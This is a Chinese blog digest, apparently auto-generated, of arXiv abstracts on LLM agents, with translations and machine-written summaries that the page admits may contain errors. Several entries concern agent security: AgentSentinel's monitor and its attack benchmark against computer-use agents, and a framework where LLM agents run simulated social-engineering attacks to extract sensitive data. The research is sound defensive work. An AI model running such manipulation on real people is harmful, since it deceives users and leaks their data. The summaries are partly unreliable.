发布日期: 2025-09-11

更新日期: 2025-10-07

文章字数: 10.9k

阅读时长: 44 分

阅读次数:

⚠️ 以下所有内容总结都来自于大语言模型的能力，如有错误，仅供参考，谨慎使用
🔴 请注意：千万不要用于严肃的学术场景，只能用于论文阅读前的初筛！
💗 如果您觉得我们的项目对您有帮助 ChatPaperFree ，还请您给我们一些鼓励！⭐️ HuggingFace免费体验

2025-09-11 更新

AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

Authors:Haitao Hu, Peng Chen, Yanpeng Zhao, Yuqi Chen

Large Language Models (LLMs) have been increasingly integrated into computer-use agents, which can autonomously operate tools on a user’s computer to accomplish complex tasks. However, due to the inherently unstable and unpredictable nature of LLM outputs, they may issue unintended tool commands or incorrect inputs, leading to potentially harmful operations. Unlike traditional security risks stemming from insecure user prompts, tool execution results from LLM-driven decisions introduce new and unique security challenges. These vulnerabilities span across all components of a computer-use agent. To mitigate these risks, we propose AgentSentinel, an end-to-end, real-time defense framework designed to mitigate potential security threats on a user’s computer. AgentSentinel intercepts all sensitive operations within agent-related services and halts execution until a comprehensive security audit is completed. Our security auditing mechanism introduces a novel inspection process that correlates the current task context with system traces generated during task execution. To thoroughly evaluate AgentSentinel, we present BadComputerUse, a benchmark consisting of 60 diverse attack scenarios across six attack categories. The benchmark demonstrates a 87% average attack success rate on four state-of-the-art LLMs. Our evaluation shows that AgentSentinel achieves an average defense success rate of 79.6%, significantly outperforming all baseline defenses.

大型语言模型（LLMs）已越来越多地融入计算机使用代理中，这些代理可以自主在用户计算机上操作工具来完成复杂任务。然而，由于LLM输出本身的不稳定和不可预测性，它们可能会发出意外的工具命令或错误的输入，从而导致潜在的有害操作。与传统的由不安全用户提示引起的安全风险不同，由LLM驱动决策的工具执行结果引入了新的和独特的 security 安全挑战。这些漏洞跨越计算机使用代理的所有组件。为了减轻这些风险，我们提出了AgentSentinel，这是一个端到端、实时防御框架，旨在减轻用户计算机上的潜在安全风险。AgentSentinel拦截与代理相关的服务中的所有敏感操作，并在完成全面安全检查之前中止执行。我们的安全审计机制引入了一种新的检查过程，该过程将当前任务上下文与任务执行期间生成的系统跟踪相关联。为了全面评估AgentSentinel，我们推出了BadComputerUse，这是一个包含60种不同攻击场景的基准测试，涵盖六大攻击类别。该基准测试在四种最新LLMs上展示了87%的平均攻击成功率。我们的评估显示，AgentSentinel达到了79.6%的平均防御成功率，显著优于所有基线防御措施。

论文及项目相关链接

PDF

Summary

大型语言模型（LLMs）驱动的计算机使用代理存在安全风险。LLMs可能发出意外的工具命令或错误的输入，导致潜在的有害操作。为此，提出AgentSentinel防御框架，通过拦截敏感操作并进行综合安全审核来减轻风险。评价结果显示，AgentSentinel的防御成功率达到79.6%，显著优于其他基础防御手段。

Key Takeaways

大型语言模型（LLMs）集成到计算机使用代理中，可以完成复杂任务，但由于LLMs的不稳定性和不可预测性，存在安全风险。
LLMs可能发出意外的工具命令或错误的输入，导致潜在的有害操作，引入新的安全挑战。
AgentSentinel是一个端到端的实时防御框架，旨在减轻计算机上的潜在安全威胁。
AgentSentinel通过拦截代理相关服务中的敏感操作，并综合系统跟踪和任务上下文进行安全审核来工作。
BadComputerUse基准测试包含60个多样化的攻击场景，成功攻击四个先进LLMs的平均成功率为87%。
评价结果显示，AgentSentinel的防御成功率达到79.6%，表现出良好的防御效果。

Cool Papers

点此查看论文截图

CAViAR: Critic-Augmented Video Agentic Reasoning

Authors:Sachit Menon, Ahmet Iscen, Arsha Nagrani, Tobias Weyand, Carl Vondrick, Cordelia Schmid

Video understanding has seen significant progress in recent years, with models’ performance on perception from short clips continuing to rise. Yet, multiple recent benchmarks, such as LVBench, Neptune, and ActivityNet-RTL, show performance wanes for tasks requiring complex reasoning on videos as queries grow more complex and videos grow longer. In this work, we ask: can existing perception capabilities be leveraged to successfully perform more complex video reasoning? In particular, we develop a large language model agent given access to video modules as subagents or tools. Rather than following a fixed procedure to solve queries as in previous work such as Visual Programming, ViperGPT, and MoReVQA, the agent uses the results of each call to a module to determine subsequent steps. Inspired by work in the textual reasoning domain, we introduce a critic to distinguish between instances of successful and unsuccessful sequences from the agent. We show that the combination of our agent and critic achieve strong performance on the previously-mentioned datasets.

视频理解在近年来取得了显著进展，模型在短片段感知方面的性能持续上升。然而，最近的多个基准测试，如LVBench、Neptune和ActivityNet-RTL，显示随着查询的复杂性和视频长度的增加，对于需要进行复杂视频推理的任务，性能会下降。在这项工作中，我们提出了一个问题：现有的感知能力能否被成功利用来执行更复杂的视频推理？特别是，我们开发了一种大型语言模型代理，该代理可以访问视频模块作为子代理或工具。与之前的工作（如视觉编程、ViperGPT和MoReVQA）不同，代理并不遵循固定的程序来解决查询，而是利用对模块的每次调用结果来确定后续步骤。受文本推理领域工作的启发，我们引入了一个评论家来区分代理中成功和失败的序列实例。我们表明，我们的代理和评论家的组合在上述数据集中表现出强大的性能。

论文及项目相关链接

PDF

Summary

该文章介绍了视频理解的现状及其面临的挑战，提出能否利用现有感知能力完成更复杂视频推理的问题。文章开发了一种大型语言模型代理，能够调用视频模块作为子代理或工具。该代理采用动态决策方式，根据模块调用结果确定后续步骤，并引入评论家来区分成功和失败的序列实例。最终，该代理和评论家的组合在多个数据集上表现出强劲性能。

Key Takeaways

视频理解领域近年来取得显著进展，但对复杂查询和长视频的推理任务性能仍有所下降。
提出问题：能否利用现有感知能力成功完成更复杂的视频推理？
开发了一种大型语言模型代理，能够调用视频模块作为工具。
代理采用动态决策方式，根据模块调用结果确定后续步骤。
引入评论家机制，以区分成功和失败的序列实例。
该代理和评论家的组合在多个数据集上表现出强劲性能。

Cool Papers

点此查看论文截图

AgentX: Towards Orchestrating Robust Agentic Workflow Patterns with FaaS-hosted MCP Services

Authors:Shiva Sai Krishna Anand Tokal, Vaibhav Jha, Anand Eswaran, Praveen Jayachandran, Yogesh Simmhan

Generative Artificial Intelligence (GenAI) has rapidly transformed various fields including code generation, text summarization, image generation and so on. Agentic AI is a recent evolution that further advances this by coupling the decision making and generative capabilities of LLMs with actions that can be performed using tools. While seemingly powerful, Agentic systems often struggle when faced with numerous tools, complex multi-step tasks,and long-context management to track history and avoid hallucinations. Workflow patterns such as Chain-of-Thought (CoT) and ReAct help address this. Here, we define a novel agentic workflow pattern, AgentX, composed of stage designer, planner, and executor agents that is competitive or better than the state-of-the-art agentic patterns. We also leverage Model Context Protocol (MCP) tools, and propose two alternative approaches for deploying MCP servers as cloud Functions as a Service (FaaS). We empirically evaluate the success rate, latency and cost for AgentX and two contemporary agentic patterns, ReAct and Magentic One, using these the FaaS and local MCP server alternatives for three practical applications. This highlights the opportunities and challenges of designing and deploying agentic workflows.

生成式人工智能（GenAI）已经迅速转变了包括代码生成、文本摘要、图像生成等在内的多个领域。代理智能（Agentic AI）是近期的一项演变，它通过结合大型语言模型的决策和生成能力与工具的执行能力，进一步推动了人工智能的发展。虽然代理系统看似强大，但在面对多种工具、复杂的多步骤任务和长期上下文管理以追踪历史和避免幻觉时，常常会遇到困难。链式思维（Chain-of-Thought，CoT）和React等工作流模式有助于解决这个问题。在这里，我们定义了一种新的代理工作流程模式AgentX，由舞台设计师、规划者和执行者代理组成，其性能与当前最先进的代理模式相当或更好。我们还利用模型上下文协议（MCP）工具，提出两种部署MCP服务器作为云功能即服务（FaaS）的替代方案。我们通过实证评估了AgentX以及两种当代代理模式（React和Magnetic One）在这三种实际应用中的成功率、延迟和成本，使用FaaS和本地MCP服务器两种替代方案。这突出了设计和部署代理工作流的机会和挑战。

论文及项目相关链接

PDF

Summary
生成式人工智能（GenAI）已迅速改变包括代码生成、文本摘要、图像生成等多个领域。新进的Agentic AI通过将大型语言模型（LLMs）的决策和生成能力与工具执行相结合，实现了进一步的进步。然而，当面对众多工具、复杂的多步骤任务和长上下文管理时，Agentic系统往往会出现困难。为解决这一问题，文中定义了一种新的agentic工作流程模式——AgentX，由舞台设计师、规划者和执行者组成，与当前主流的agentic模式相比具有竞争力或更好。同时，文章还利用模型上下文协议（MCP）工具，提出了两种部署MCP服务器作为云函数即服务（FaaS）的替代方案。通过实证评估，文章对比了AgentX以及两种当代的agentic模式——ReAct和Magnetic One，在FaaS和本地MCP服务器替代方案下的三个实际应用中的成功率、延迟和成本。这突出了设计和发展agentic工作流的机会和挑战。

Key Takeaways

GenAI已改变多个领域，包括代码生成和图像生成。
Agentic AI结合LLMs的决策和生成能力与工具执行。
Agentic系统在处理多工具、复杂任务和长上下文管理时面临挑战。
提出了新型的agentic工作流程模式——AgentX，由舞台设计师、规划者和执行者组成。
利用模型上下文协议（MCP）工具，提出两种部署MCP服务器的替代方案。
通过实证评估，对比了AgentX与其他agentic模式在成功率、延迟和成本方面的表现。

Cool Papers

点此查看论文截图

Towards Generalized Routing: Model and Agent Orchestration for Adaptive and Efficient Inference

Authors:Xiyu Guo, Shan Wang, Chunfang Ji, Xuefeng Zhao, Wenhao Xi, Yaoyao Liu, Qinglan Li, Chao Deng, Junlan Feng

The rapid advancement of large language models (LLMs) and domain-specific AI agents has greatly expanded the ecosystem of AI-powered services. User queries, however, are highly diverse and often span multiple domains and task types, resulting in a complex and heterogeneous landscape. This diversity presents a fundamental routing challenge: how to accurately direct each query to an appropriate execution unit while optimizing both performance and efficiency. To address this, we propose MoMA (Mixture of Models and Agents), a generalized routing framework that integrates both LLM and agent-based routing. Built upon a deep understanding of model and agent capabilities, MoMA effectively handles diverse queries through precise intent recognition and adaptive routing strategies, achieving an optimal balance between efficiency and cost. Specifically, we construct a detailed training dataset to profile the capabilities of various LLMs under different routing model structures, identifying the most suitable tasks for each LLM. During inference, queries are dynamically routed to the LLM with the best cost-performance efficiency. We also introduce an efficient agent selection strategy based on a context-aware state machine and dynamic masking. Experimental results demonstrate that the MoMA router offers superior cost-efficiency and scalability compared to existing approaches.

随着大型语言模型（LLM）和特定领域AI代理人的快速发展，AI助力服务的生态系统得到了极大的扩展。然而，用户查询具有高度多样性，通常涉及多个领域和任务类型，形成了一个复杂且异构的景观。这种多样性带来了一个基本的路由挑战：如何准确地将每个查询导向适当的执行单元，同时优化性能和效率。针对这一问题，我们提出了MoMA（模型和代理人混合，Mixture of Models and Agents）体系，这是一个结合了LLM和基于代理人的路由的通用路由框架。基于模型和代理人能力的深刻理解，MoMA通过精确意图识别和自适应路由策略有效处理各种查询，在效率和成本之间实现最优平衡。具体来说，我们构建了一个详细的训练数据集，以分析不同路由模型结构下各种LLM的能力，并确定每个LLM最合适的任务。在推理过程中，查询被动态路由到具有最佳成本性能效率的LLM。我们还引入了一种基于上下文感知状态机和动态遮罩的有效代理人选择策略。实验结果表明，MoMA路由器相比现有方法具有更高的成本效益和可扩展性。

论文及项目相关链接

PDF

Summary

大型语言模型（LLMs）和领域特定AI代理的快速发展极大地扩展了AI服务生态系统。用户查询高度多样，跨越多个领域和任务类型，形成了一个复杂且异构的景观，给准确路由查询带来了挑战。为解决此问题，我们提出了MoMA（模型和代理的混合体）这一通用路由框架，融合了LLM和代理基础路由。MoMA通过深度理解模型和代理的能力，通过精确意图识别和自适应路由策略有效处理各种查询，实现了效率和成本的优化平衡。MoMA构建了详细的训练数据集，以识别不同路由模型结构下各种LLMs的能力，并为每种LLM确定最合适的任务。在推理过程中，查询被动态路由到具有最佳成本性能效率的LLM。实验结果证明，MoMA路由器相比现有方法具有优越的成本效率和可扩展性。

Key Takeaways

大型语言模型（LLMs）和领域特定AI代理的快速发展促进了AI服务生态系统的扩展。
用户查询的多样性给准确路由查询带来了挑战。
MoMA是一个通用路由框架，融合了LLM和代理基础路由，以处理多样查询。
MoMA通过深度理解模型和代理的能力，实现精确意图识别和自适应路由策略。
MoMA构建了详细的训练数据集，以识别不同路由模型结构下LLMs的能力并匹配最适合的任务。
查询在推理过程中被动态路由到具有最佳成本性能效率的LLM。

Cool Papers

点此查看论文截图

VeriOS: Query-Driven Proactive Human-Agent-GUI Interaction for Trustworthy OS Agents

Authors:Zheng Wu, Heyuan Huang, Xingyu Lou, Xiangmou Qu, Pengzhou Cheng, Zongru Wu, Weiwen Liu, Weinan Zhang, Jun Wang, Zhaoxiang Wang, Zhuosheng Zhang

With the rapid progress of multimodal large language models, operating system (OS) agents become increasingly capable of automating tasks through on-device graphical user interfaces (GUIs). However, most existing OS agents are designed for idealized settings, whereas real-world environments often present untrustworthy conditions. To mitigate risks of over-execution in such scenarios, we propose a query-driven human-agent-GUI interaction framework that enables OS agents to decide when to query humans for more reliable task completion. Built upon this framework, we introduce VeriOS-Agent, a trustworthy OS agent trained with a two-stage learning paradigm that falicitate the decoupling and utilization of meta-knowledge. Concretely, VeriOS-Agent autonomously executes actions in normal conditions while proactively querying humans in untrustworthy scenarios. Experiments show that VeriOS-Agent improves the average step-wise success rate by 20.64% in untrustworthy scenarios over the state-of-the-art, without compromising normal performance. Analysis highlights VeriOS-Agent’s rationality, generalizability, and scalability. The codes, datasets and models are available at https://github.com/Wuzheng02/VeriOS.

随着多模态大型语言模型的快速发展，操作系统（OS）代理通过设备上的图形用户界面（GUI）越来越能够自动化任务。然而，大多数现有的操作系统代理是针对理想化环境设计的，而现实世界的环境通常存在不可信的条件下。为了减轻此类场景中过度执行的风险，我们提出了一种查询驱动的人机交互框架，使操作系统代理能够决定何时向人类查询以更可靠地完成任务。基于该框架，我们引入了VeriOS-Agent，这是一个可信的操作系统代理，采用两阶段学习范式训练，促进元知识的解耦和利用。具体来说，VeriOS-Agent在正常情况下自主执行操作，并在不可信场景中主动查询人类。实验表明，在不可信场景中，VeriOS-Agent的平均步骤成功率比最新技术提高了20.64%，同时不影响正常性能。分析强调了VeriOS-Agent的合理性、通用性和可扩展性。相关代码、数据集和模型可在https://github.com/Wuzheng02/VeriOS获取。

论文及项目相关链接

PDF

Summary
多模态大型语言模型的快速发展使得操作系统代理能够通过设备上的图形用户界面自动化任务。然而，针对现实环境中存在的不信任情况，我们提出了一个查询驱动的人机交互框架，使操作系统代理能够在必要时查询人类以更可靠地完成任务。基于此框架，我们引入了VeriOS-Agent，一个可信的操作系统代理，采用两阶段学习范式训练，便于元知识的解耦和利用。在正常情况下，VeriOS-Agent可以自主执行任务，在不信任场景中则主动询问人类意见。实验表明，VeriOS-Agent在不信任场景中的平均步骤成功率比最新技术高出20.64%，且不影响正常性能。分析突出了VeriOS-Agent的合理性、通用性和可扩展性。相关代码和数据集可在链接找到。

Key Takeaways

多模态大型语言模型的进步使得操作系统代理能够更自动化地完成任务，通过设备上的图形用户界面实现。
现实环境中的不信任情况需要操作系统代理在必要时查询人类以提高任务完成的可靠性。
VeriOS-Agent是一个基于查询驱动框架的操作系统代理，能够在不信任场景中主动询问人类，同时保持正常情况下的自主执行任务能力。
VeriOS-Agent采用两阶段学习范式训练，便于元知识的解耦和利用。
实验表明，VeriOS-Agent在不信任场景中的性能优于现有技术，平均步骤成功率提高20.64%。
VeriOS-Agent在不影响正常性能的情况下提高了任务完成的可靠性。

Cool Papers

点此查看论文截图

Authors:Xiaobei Zhao, Xingqi Lyu, Xiang Li

Agricultural robotic agents have been becoming powerful helpers in a wide range of agricultural tasks, nevertheless, still heavily rely on manual operation or untransportable railway for movement. The AgriVLN method and the A2A benchmark pioneeringly extend Vision-and-Language Navigation (VLN) to the agricultural domain, enabling agents navigate to the target position following the natural language instructions. AgriVLN effectively understands the simple instructions, however, often misunderstands the complicated instructions. To bridge this gap, we propose the method of Translator for Agricultural Robotic Agents on Vision-and-Language Navigation (T-araVLN), in which the Instruction Translator module translates the original instruction to be both refined and precise. Being evaluated on the A2A benchmark, our T-araVLN effectively improves SR from 0.47 to 0.63 and reduces NE from 2.91m to 2.28m, demonstrating the state-of-the-art performance in the agricultural domain. Code: https://github.com/AlexTraveling/T-araVLN.

农业机器人代理已经在广泛的农业任务中成为强大的助手，然而，仍然严重依赖于手动操作或不可移动的铁路进行移动。AgriVLN方法和A2A基准率先将视觉和语言导航（VLN）扩展到农业领域，使代理能够根据自然语言指令导航到目标位置。AgriVLN能有效地理解简单指令，但常常误解复杂指令。为了弥补这一差距，我们提出了针对农业机器人代理的视觉和语言导航翻译方法（T-araVLN），其中的指令翻译模块将原始指令翻译为既精炼又精确的指令。在A2A基准上进行评估，我们的T-araVLN方法有效地将成功率从0.47提高到0.63，将导航误差从2.91米减少到2.28米，展现了在农业领域的最先进性能。代码地址：https://github.com/AlexTraveling/T-araVLN。

论文及项目相关链接

PDF

Summary

农业机器人已经在广泛的农业任务中成为有力的助手，但它们仍然严重依赖于手动操作或不可移动的铁路进行移动。AgriVLN方法和A2A基准率先将视觉和语言导航（VLN）扩展到农业领域，使代理能够根据自然语言指令导航到目标位置。AgriVLN虽然能有效理解简单指令，但往往误解复杂指令。为了弥补这一差距，我们提出了针对农业机器人代理的视觉和语言导航的翻译方法（T-araVLN），其中的指令翻译模块将原始指令翻译为精细准确的指令。在A2A基准测试上评估，我们的T-araVLN方法有效地提高了成功率从0.47到0.63，并降低了导航误差从2.91米到2.28米，展现了农业领域的最先进的性能。

Key Takeaways

农业机器人已成为广泛农业任务的有力助手，但仍面临移动方式的问题。
AgriVLN方法和A2A基准首次将视觉和语言导航技术应用到农业领域。
AgriVLN能有效理解简单指令，但在处理复杂指令时存在误解的问题。
为了解决上述问题，提出了T-araVLN方法，其中的指令翻译模块能够精细准确地翻译指令。
在A2A基准测试上，T-araVLN方法提高了成功率并降低了导航误差。
T-araVLN方法展示了农业领域的最先进的性能。

Cool Papers

点此查看论文截图

SFR-DeepResearch: Towards Effective Reinforcement Learning for Autonomously Reasoning Single Agents

Authors:Xuan-Phi Nguyen, Shrey Pandit, Revanth Gangi Reddy, Austin Xu, Silvio Savarese, Caiming Xiong, Shafiq Joty

Equipping large language models (LLMs) with complex, interleaved reasoning and tool-use capabilities has become a key focus in agentic AI research, especially with recent advances in reasoning-oriented (``thinking’’) models. Such capabilities are key to unlocking a number of important applications. One such application is Deep Research (DR), which requires extensive search and reasoning over many sources. Our work in this paper focuses on the development of native Autonomous Single-Agent models for DR featuring minimal web crawling and Python tool integration. Unlike multi-agent systems, where agents take up pre-defined roles and are told what to do at each step in a static workflow, an autonomous single-agent determines its next action dynamically based on context, without manual directive. While prior work has proposed training recipes for base or instruction-tuned LLMs, we focus on continual reinforcement learning (RL) of reasoning-optimized models to further enhance agentic skills while preserving reasoning ability. Towards this end, we propose a simple RL recipe with entirely synthetic data, which we apply to various open-source LLMs. Our best variant SFR-DR-20B achieves up to 28.7% on Humanity’s Last Exam benchmark. In addition, we conduct key analysis experiments to provide more insights into our methodologies.

赋予大型语言模型（LLM）复杂、交织的推理和工具使用能力已成为代理人工智能研究的关键焦点，特别是随着面向推理的（“思考”）模型的最近进展。这些能力是解锁许多重要应用的关键。其中一个应用是深度研究（DR），它需要在多个来源之间进行广泛搜索和推理。本文的工作重点是为DR开发本地自主单代理模型，具有最少的网络爬虫和Python工具集成。不同于多代理系统，其中代理扮演预定义角色，并在静态工作流中的每一步被告知要做什么，自主单个代理会基于上下文动态地确定其下一个行动，无需手动指令。虽然先前的工作已经提出了针对基础或指令调整LLM的训练食谱，但我们专注于对推理优化模型的持续强化学习（RL），以进一步增强代理技能，同时保留推理能力。为此，我们提出了一种简单的RL食谱，使用完全合成数据，并应用于各种开源LLM。我们最好的变体SFR-DR-20B在人类最后考试基准测试中达到了28.7%的准确率。此外，我们还进行了关键的分析实验，以更深入地了解我们的方法。

论文及项目相关链接

PDF Technical Report

Summary

大型语言模型（LLM）配备复杂交织的推理和工具使用能力已成为代理人工智能研究的关键焦点，特别是最近出现的以推理为导向的“思考”模型。本文专注于为深度研究（DR）开发自主单一代理模型，具有最小的网络爬虫和Python工具集成。不同于多代理系统，自主单一代理可基于上下文动态确定其下一步行动，无需手动指令。我们专注于持续强化学习（RL）的推理优化模型，以提高代理技能并保留推理能力。通过应用各种开源LLM的简单RL配方，我们的最佳变体SFR-DR-20B在Humanity’s Last Exam基准测试中达到了28.7%的准确率。

Key Takeaways

大型语言模型（LLM）正在发展具有复杂、交织的推理和工具使用能力，成为代理人工智能研究的关键。
自主单一代理模型具有动态决定行动的能力，不同于多代理系统的静态工作流程。
论文专注于深度研究（DR）的自主单一代理模型开发，该模型具有最小的网络爬虫和Python工具集成需求。
采用持续强化学习（RL）来提高推理优化模型的代理技能。
提出了一种简单的RL配方，适用于各种开源LLM。
最佳模型变体SFR-DR-20B在Humanity’s Last Exam基准测试中取得了显著成绩。

Cool Papers

点此查看论文截图

EvoEmo: Towards Evolved Emotional Policies for LLM Agents in Multi-Turn Negotiation

Authors:Yunbo Long, Liming Xu, Lukas Beckenbauer, Yuhan Liu, Alexandra Brintrup

Recent research on Chain-of-Thought (CoT) reasoning in Large Language Models (LLMs) has demonstrated that agents can engage in \textit{complex}, \textit{multi-turn} negotiations, opening new avenues for agentic AI. However, existing LLM agents largely overlook the functional role of emotions in such negotiations, instead generating passive, preference-driven emotional responses that make them vulnerable to manipulation and strategic exploitation by adversarial counterparts. To address this gap, we present EvoEmo, an evolutionary reinforcement learning framework that optimizes dynamic emotional expression in negotiations. EvoEmo models emotional state transitions as a Markov Decision Process and employs population-based genetic optimization to evolve high-reward emotion policies across diverse negotiation scenarios. We further propose an evaluation framework with two baselines – vanilla strategies and fixed-emotion strategies – for benchmarking emotion-aware negotiation. Extensive experiments and ablation studies show that EvoEmo consistently outperforms both baselines, achieving higher success rates, higher efficiency, and increased buyer savings. This findings highlight the importance of adaptive emotional expression in enabling more effective LLM agents for multi-turn negotiation.

关于大型语言模型（LLM）中的思维链（CoT）推理的最近研究表明，智能体可以参与复杂的多轮谈判，为智能体人工智能打开了新的途径。然而，现有的LLM智能体在很大程度上忽视了情绪在这种谈判中的功能作用，而是产生被动、偏好驱动的情绪反应，使它们容易受到对抗性对手的操纵和战略利用。为了弥补这一空白，我们提出了EvoEmo，这是一个进化强化学习框架，优化了谈判中的动态情绪表达。EvoEmo将情绪状态转换建模为马尔可夫决策过程，并基于种群遗传优化来进化多种谈判场景下的高回报情绪策略。我们还提出了一个评估框架，包括两个基准线——普通策略和固定情绪策略——用于评估情感感知谈判。大量实验和消融研究表明，EvoEmo始终优于这两个基准线，具有更高的成功率、更高的效率和更高的买家节省。这些发现突显了在多轮谈判中自适应情绪表达的重要性，这对于使LLM智能体更有效是至关重要的。

论文及项目相关链接

PDF

Summary

近期研究表明，基于Chain-of-Thought（CoT）的大型语言模型（LLM）能够进行复杂的多轮谈判，开启了人工智能代理的新方向。然而，现有LLM代理在很大程度上忽视了情感在谈判中的功能作用，容易产生被动、偏好驱动的情绪反应，使得它们容易被对手操纵和战略性地利用。为解决这一不足，我们提出了EvoEmo框架，它通过进化强化学习优化谈判中的动态情感表达。EvoEmo将情感状态转换建模为马尔可夫决策过程，并采用基于种群的遗传优化来演化不同谈判场景下的高回报情感策略。我们还提出了一个评估框架，包括基准策略和固定情感策略，用于评估情感感知谈判的表现。大量实验和消融研究结果表明，EvoEmo在成功率、效率和买家节省方面均优于基准策略，突显了自适应情感表达在使LLM代理进行多轮谈判时更有效的重要性。

Key Takeaways

LLMs通过Chain-of-Thought（CoT）进行复杂多轮谈判展现了新的能力。
现有LLM代理在谈判中忽视了情感的作用，易受到对手的策略性操纵。
EvoEmo框架采用进化强化学习优化谈判中的动态情感表达。
EvoEmo将情感状态转换建模为马尔可夫决策过程。
通过基于种群的遗传优化演化情感策略以应对不同的谈判场景。
评估框架包括基准策略和固定情感策略作为比较基准。

Cool Papers

点此查看论文截图

AI-SearchPlanner: Modular Agentic Search via Pareto-Optimal Multi-Objective Reinforcement Learning

Authors:Lang Mei, Zhihan Yang, Chong Chen

Recent studies have explored integrating Large Language Models (LLMs) with search engines to leverage both the LLMs’ internal pre-trained knowledge and external information. Specially, reinforcement learning (RL) has emerged as a promising paradigm for enhancing LLM reasoning through multi-turn interactions with search engines. However, existing RL-based search agents rely on a single LLM to handle both search planning and question-answering (QA) tasks in an end-to-end manner, which limits their ability to optimize both capabilities simultaneously. In practice, sophisticated AI search systems often employ a large, frozen LLM (e.g., GPT-4, DeepSeek-R1) to ensure high-quality QA. Thus, a more effective and efficient approach is to utilize a small, trainable LLM dedicated to search planning. In this paper, we propose \textbf{AI-SearchPlanner}, a novel reinforcement learning framework designed to enhance the performance of frozen QA models by focusing on search planning. Specifically, our approach introduces three key innovations: 1) Decoupling the Architecture of the Search Planner and Generator, 2) Dual-Reward Alignment for Search Planning, and 3) Pareto Optimization of Planning Utility and Cost, to achieve the objectives. Extensive experiments on real-world datasets demonstrate that AI SearchPlanner outperforms existing RL-based search agents in both effectiveness and efficiency, while exhibiting strong generalization capabilities across diverse frozen QA models and data domains.

最近的研究探讨了如何将大型语言模型（LLM）与搜索引擎相结合，以利用LLM的内部预训练知识和外部信息。特别是，强化学习（RL）已成为一种有望通过多轮与搜索引擎的交互增强LLM推理能力的范式。然而，现有的基于RL的搜索代理依赖于单个LLM以端到端的方式处理搜索规划和问答（QA）任务，这限制了它们同时优化这两种功能的能力。在实践中，复杂的AI搜索系统通常会采用大型、固定的LLM（如GPT-4、DeepSeek-R1）来确保高质量的问答。因此，一个更有效和高效的方法是使用一个小型的、可训练的LLM专门用于搜索规划。在本文中，我们提出了\textbf{AI-SearchPlanner}，这是一种新型的强化学习框架，旨在通过专注于搜索规划来提高固定问答模型的性能。具体来说，我们的方法引入了三个关键创新点：1）解耦搜索规划器和生成器的架构，2）搜索规划的双奖励对齐，以及3）规划和成本的帕累托优化，以实现目标。在真实数据集上的大量实验表明，AI SearchPlanner在有效性和效率方面优于现有的基于RL的搜索代理，同时在不同的固定问答模型和数据域中表现出强大的泛化能力。

论文及项目相关链接

PDF

Summary

大型语言模型（LLM）与搜索引擎的整合研究正在兴起，通过利用LLM的内部预训练知识和外部信息来提升搜索效率。强化学习（RL）已成为增强LLM推理能力的一种有前途的方法，通过多轮与搜索引擎的互动来实现。然而，现有的RL-based搜索代理依赖于单一LLM同时处理搜索规划和问答任务，这限制了两者能力的优化。为提升效率与效果，本文提出了AI-SearchPlanner，一个旨在通过聚焦于搜索规划增强冻结问答模型性能的新型强化学习框架。包括三个关键创新点：搜索规划器和生成器架构的解耦、搜索规划的双奖励对齐以及规划效用和成本的帕累托优化。在真实数据集上的实验表明，AI SearchPlanner在有效性和效率上均优于现有的RL-based搜索代理，并在不同的冻结问答模型和领域数据上展现出强大的泛化能力。

Key Takeaways

大型语言模型（LLM）与搜索引擎整合是研究的热点，旨在结合LLM的内部知识和外部信息提升搜索效率。
强化学习（RL）被用于增强LLM的推理能力，通过多轮互动提升搜索质量。
现有RL-based搜索代理使用单一LLM处理搜索规划和问答任务，限制了优化效果。
AI-SearchPlanner框架旨在通过聚焦于搜索规划增强冻结问答模型的性能。
AI-SearchPlanner有三个关键创新点：架构解耦、双奖励对齐和帕累托优化。
实验证明AI SearchPlanner在真实数据集上表现优于现有方法，在效果和效率上都有显著提升。

Cool Papers

点此查看论文截图

Authors:Tharindu Kumarage, Cameron Johnson, Jadie Adams, Lin Ai, Matthias Kirchner, Anthony Hoogs, Joshua Garland, Julia Hirschberg, Arslan Basharat, Huan Liu

The rapid advancement of conversational agents, particularly chatbots powered by Large Language Models (LLMs), poses a significant risk of social engineering (SE) attacks on social media platforms. SE detection in multi-turn, chat-based interactions is considerably more complex than single-instance detection due to the dynamic nature of these conversations. A critical factor in mitigating this threat is understanding the SE attack mechanisms through which SE attacks operate, specifically how attackers exploit vulnerabilities and how victims’ personality traits contribute to their susceptibility. In this work, we propose an LLM-agentic framework, SE-VSim, to simulate SE attack mechanisms by generating multi-turn conversations. We model victim agents with varying personality traits to assess how psychological profiles influence susceptibility to manipulation. Using a dataset of over 1000 simulated conversations, we examine attack scenarios in which adversaries, posing as recruiters, funding agencies, and journalists, attempt to extract sensitive information. Based on this analysis, we present a proof of concept, SE-OmniGuard, to offer personalized protection to users by leveraging prior knowledge of the victims personality, evaluating attack strategies, and monitoring information exchanges in conversations to identify potential SE attempts.

对话代理人的快速发展，特别是由大型语言模型（LLM）驱动的聊天机器人，给社交媒体平台带来了社会工程（SE）攻击的重大风险。基于多轮对话的社会工程检测比单实例检测要复杂得多，因为对话是动态的。缓解这一威胁的关键在于了解社会工程攻击的机制，特别是攻击者如何利用漏洞以及受害者的人格特质如何导致他们容易受到攻击。在这项工作中，我们提出了一种LLM-agentic框架SE-VSim，通过生成多轮对话来模拟SE攻击机制。我们为具有不同人格特质的受害者代理建模，以评估心理特征如何影响他们被操纵的易感性。使用超过1000个模拟对话的数据集，我们分析了攻击场景，其中对手伪装成招聘人员、资助机构和记者，试图提取敏感信息。基于这种分析，我们提出了一个概念证明SE-OmniGuard，通过利用受害者人格特征的先验知识、评估攻击策略并监控对话中的信息交换来识别潜在的社会工程尝试，为用户提供个性化保护。

论文及项目相关链接

PDF Accepted as a paper at COLM 2025 Workshop on AI Agents: Capabilities and Safety

Summary

对话式代理，特别是基于大型语言模型（LLM）的聊天机器人，在社交媒体平台上对社会工程（SE）攻击存在重大风险。在多轮对话中检测SE攻击比单实例检测更为复杂。减轻威胁的关键在于理解SE攻击机制，包括攻击者如何利用漏洞和受害者的人格特质如何导致他们易受攻击。本研究提出了一个LLM代理框架SE-VSim，通过生成多轮对话来模拟SE攻击机制。我们模拟具有不同人格特质的受害者代理，以评估心理特征如何影响对操纵的易感性。使用超过1000个模拟对话的数据集，我们分析了攻击场景，其中假冒招聘人员、资助机构和记者的对手试图获取敏感信息。基于此分析，我们提出了一个概念验证SE-OmniGuard，通过利用受害者的先验人格知识、评估攻击策略以及监控对话中的信息交换来为个性化用户提供保护，以识别潜在的SE尝试。

Key Takeaways

对话式代理和基于大型语言模型的聊天机器人面临社交媒体平台上的社会工程攻击风险。
SE检测在多轮对话中更为复杂，需要深入理解SE攻击机制。
